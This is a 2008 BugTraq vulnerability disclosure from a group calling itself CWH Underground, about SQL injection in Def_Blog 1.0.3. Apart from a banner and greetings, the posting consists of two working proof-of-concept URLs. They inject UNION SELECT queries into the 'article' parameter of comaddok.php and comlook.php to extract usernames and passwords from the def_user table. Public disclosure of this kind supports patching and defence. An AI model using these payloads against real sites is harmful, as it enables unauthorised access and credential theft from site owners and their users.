BugTraq
Def_Blog 1.0.3 Multiple Remote SQL Injection Vulnerabilities Jul 18 2008 01:30AM
tan_prathan hotmail com
================================================================

Def_Blog 1.0.3 Multiple Remote SQL Injection Vulnerabilities

================================================================

,--^----------,--------,-----,-------^--,

| ||||||||| `--------' | O .. CWH Underground Hacking Team ..

`+---------------------------^----------|

`\_,-------, _________________________|

/ XXXXXX /`| /

/ XXXXXX / `\ /

/ XXXXXX /\______(

/ XXXXXX /

/ XXXXXX /

(________(

`------'

AUTHOR : CWH Underground

DATE : 16 July 2008

SITE : cwh.citec.us

#####################################################

APPLICATION : Def_Blog

VERSION : 1.0.3

DOWNLOAD : http://www.easy-script.com/Def_Blog_V.1.0.3.zip

#####################################################

-- Remote SQL Injection ---

-----------------

Vulnerable File

-----------------

[+] comaddok.php

[+] comlook.php

-------------

POC Exploit

-------------

[+] http://[Target]/[def_blog_path]/comaddok.php?article=-1+union+select+1,c
oncat(pseudo,0x3a3a,mdp)+from+def_user--

[+] http://[Target]/[def_blog_path]/comlook.php?article=-1+union+select+1,2,
3,4,concat(pseudo,0x3a3a,mdp),6,7+from+def_user--

#####################################################################

Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos

Special Thx : asylu3, citec.us

#####################################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus